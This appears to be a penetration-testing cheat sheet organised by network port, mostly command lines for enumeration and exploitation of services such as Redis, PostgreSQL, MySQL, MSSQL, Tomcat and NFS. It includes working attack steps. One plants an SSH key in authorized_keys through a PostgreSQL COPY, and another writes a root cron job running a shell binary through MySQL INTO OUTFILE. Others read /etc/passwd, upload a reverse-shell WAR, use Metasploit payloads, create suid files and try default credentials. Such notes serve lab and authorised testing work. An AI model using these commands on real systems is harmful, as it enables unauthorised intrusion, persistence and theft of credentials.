akde/infosec

Click Here

  • 50051 GRPC

    Enumeration Mandatory Optional

  • 53 DNS

    Enumeration Mandatory Try to per­form a zone trans­fer:dig axfr @10.10.11.166 trick.htb

  • 4369 epmd

    Erlang Port Map­per Daemon Enumeration Mandatory Check if epmd is run­ningecho -n -e "\x00\x01\x6e" | nc -vn $target 4369 Check with nmapnmap -sV -Pn -n -T4 -p 4369 --script epmd-info $target Brute force the key with https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ and try the RCE.

  • 33060 MySQLX

    Enumeration Mandatory Try to connect:  Start the con­sole:/opt/mysql-shell-8.0.23-linux-glibc2.12-x86-64bit/bin# ./mysqlsh Try to con­nect with default cre­den­tials or found ones:MySQL JS > var test_conn = require('mysqlx');MySQL JS > var session = mysqlx.getSession({host: '192.168.156.58', user: 'root', password: 'root', port: 33060});

  • 4505/4506 Salt

    Enumeration Mandatory Check CVE-2020–11651 Note that exe­cu­tion of sched­uled tasks can take 5–10 minutes.

  • 27017 MongoDB

    Enumeration Try to just login. Per default, no user is required.mongodb $target Enu­mer­ate with NSE scriptsnmap -sV --script "mongo* and default" -p 27017 $target Try to con­nectmongo 'mongodb://nodebb:nodebb@192.168.91.69:27017/nodebb' Optional Try https://github.com/codingo/NoSQLMap

  • 1521 Oracle SQL

    Enumeration See Ora­cle article

  • 6667 IRC

    Enumeration Mandatory Enu­mer­ate with nmapnmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 6697 $target Con­nect and get ver­sion infor­ma­tiontelnet $target 6697USER duperuser4242 0 * duperuser4242NICK duperuser4242VERSIONINFOHELP Optional

  • 119 NNTP

    Enumeration Mandatory Grab ban­nertelnet $target 119 Enu­mer­ate with nmapnmap -p 119 --script nntp-ntlm-info $target Optional

  • 110 POP3

    Enumeration Mandatory Grab ban­nertelnet $target 110openssl s_client -connect $target:995 -crlf -quiet In case of issues, see the openssl arti­cle. Search for exploits. If you have cre­den­tials, log in and read the emails. Optional

  • 465 SMTPS

    See SMTP article

  • 3690 SVN

    Enumeration Mandatory Try to check­out a repo:svn check­out svn://$target Optional Check all branches Go through each revi­sion. (Use grep widely!) Add a new file which could be acces­si­ble in the web.

  • 8009 Tomcat JServ

    Enumeration Mandatory Check on the HTTP port 8080 if /manager is acces­si­ble (default cre­den­tials: tom­cat / s3cret or admin / admin). If yes, upload a reverse shell WAR file. Optional Try to brute-force with msf> use scanner/http/tomcat_mgr_login.

  • 6379 Redis

    Enumeration Mandatory Try to con­nect:telnet $target 6379 // or: redis-cli -h $target...infoCONFIG GET *system.exec "id" Try to check if you can deter­mine the exis­tence of direc­to­ries.config set dir /var/www/htdocs-ERR Changing directory: No such file or directoryconfig set dir /etc+OK Try to write.  Gen­er­al com­mands:config set dir /var/www/html+OKconfig set dbfilename t.txt+OKset test "hallo"+OKsave+OK Pos­si­ble places:  Upload a…

  • 5985 WinRM

    Enumeration Mandatory Option­al

  • 5900 VNC

    Enumeration Optional Brute force with nmap.

  • 5432 PostgreSQL

    Enumeration Mandatory Try to connect. Optional Priv­i­lege esca­la­tion with­in PSQL to supe­ruser: https://staaldraad.github.io/post/2020–12-15-cve-2020–25695-postgresql-privesc/ Try to read files: postgres=# CREATE TABLE demo(t text);CREATE TABLEpostgres=# COPY demo from '/etc/passwd';COPY 20postgres=# SELECT * FROM demo; Try to write a file: COPY (select convert_from(decode('c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESWh5ZEc3aUQ5a0ZoMjJLMklmNFpyc2FvbHlINVBabkZZK3JqaXRKV3VXTGhjVTQxVWtVUEZOYVJJM1dZcVFWdlJZSlpHRTB1VkFacHJuZFJEbWJtMUVGZER0N1JLejdoQ0tJUytpTjNwMUVuVTcrOVpFVUdMTEYzc1NOTFFzalNmWTVJaTlzSWVHUU01UnltbURwdGp3VVJJaWk0Z3ErMTZzVWVnSTU4WHdlVkxIZ2R1M0wrVWJ1c2lxSHVyLy9sSy9KZTFsTnNNVnJuTXJ1dnZ6Q3dvdUNXL2ZSV1dXRGRUbXJ6MXNhbmx6N1F6QjNZS3RrdmxiNEthTE5kL20xaUJyaWtzMEkrM2Ruc3lGT1h4d1kzWkJjVHB2Q3k4ZzdueDllb28zTjJtVEVaSS83WUxIeGFWbTlMVDRzWEdDWUtUN3Z1eE1EUmZHajdYcnhQUGVUaEggcm9vdEBpbWFjMjAxOS1rYWxpCg==','base64'),'utf-8')) to '/var/lib/postgresql/.ssh/authorized_keys';

  • 3389 RDP

    Enumeration Mandatory Try to con­nect with­in a win­dow man­ag­er:rdesktop $target Optional If you have shell acess, try to cre­ate a new user account which is in the group Remote Desk­top Users or add this group to an exist­ing user.

  • 3306 MySQL

    Enumeration Mandatory Try to con­nect to the DB. Enu­mer­ate with nmap:nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target Optional If you have access to the DB:  Try to read local files:SELECT load_file('/etc/passwd'); Try to write files:CREATE TABLE bbb(content TEXT);INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';

  • 1433 MSSQL

    Enumeration Mandatory Deter­mine ver­sion:nmap -p 445 --script ms-sql-info $target If cre­den­tials are known:  Try to con­nect to the DB (alter­na­tive: Intel­liJ, …):sqsh -U sa -P $password -S $target:1433 Try to exe­cute com­mands:msf> use auxiliary/admin/mssql/mssql_execmsf> use windows/mssql/mssql_payload If mssql_exec does­n’t work, take care of domain/username and powershell.exe ‑com­mand type system. Optional Brute-force login (e.g. with msf> use…

  • 1100 Java RMI

    Enumeration Mandatory Check con­fig­u­ra­tion:nmap -sSVC --script rmi-dumpregistry -p 1100 $target Optional Try msf> use scanner/misc/java_rmi_server if class upload is pos­si­ble; if yes, try msf> use multi/misc/java_rmi_server. Try to exploit with BaRMIe.

  • 554 RTSP

    Enumeration Mandatory Check which streams are open:nmap --script rtsp-url-brute -p 554 $target

  • 500 IKE

    Enumeration Mandatory Enu­mer­ate with ike-scan

  • 636 LDAPS

    See the LDAP checklist

  • 389 LDAP

    Enumeration Mandatory Enu­mer­ate with nmap:nmap -n -sV --script "ldap* and not brute" $target Scan with LDAPsearch:ldapsearch -x -h $target -D '' -w '' -b "DC=BLA,DC=local" Con­nect to SSL ports:openssl s_client -connect $target:636 </dev/nullopenssl s_client -connect $target:3269 </dev/null

  • 161 SNMP

    Enumeration Mandatory

  • 139/445 SMB

    Note: 139 = Net­BIOS is a ses­sion lay­er pro­to­col and ser­vice and dif­fer­ent from 445 SMB. Enumeration Mandatory If you have no cre­den­tials yet: If you have already user credentials: On Windows Optional

  • 135 RPC

    Enumeration Mandatory Get a list of reg­is­tered pro­grams via rpcbind/v2 (pre­vi­ous portmap­per!):rpcinfo -p $target Get a list of reg­is­tered pro­grams via rpcbind/3:rpcinfo -s $target If suc­cess­ful: Con­nect with the RPC con­sole:rpcclient -U "" $target Enu­mer­ate with the queries on the RPC pro­to­col post. Optional Try to brute-force accounts (no lock here!) Try oth­er enu­mer­a­tion tools from the…

  • 113 Ident

    Enumeration Mandatory Show users and process­es from known ports:ident-user-enum $target 139 445 … <- add all known ports here

  • 111 NFS

    Enumeration Mandatory Check if the tar­get expos­es open shares:showmount -e $target If there are some, try to mount them. If you can mount them, check if you can write files and set the s flag. (If in export no_root_squash is defined.) If yes, cre­ate a new file with a suid bit. Optional Try to use anoth­er NFS…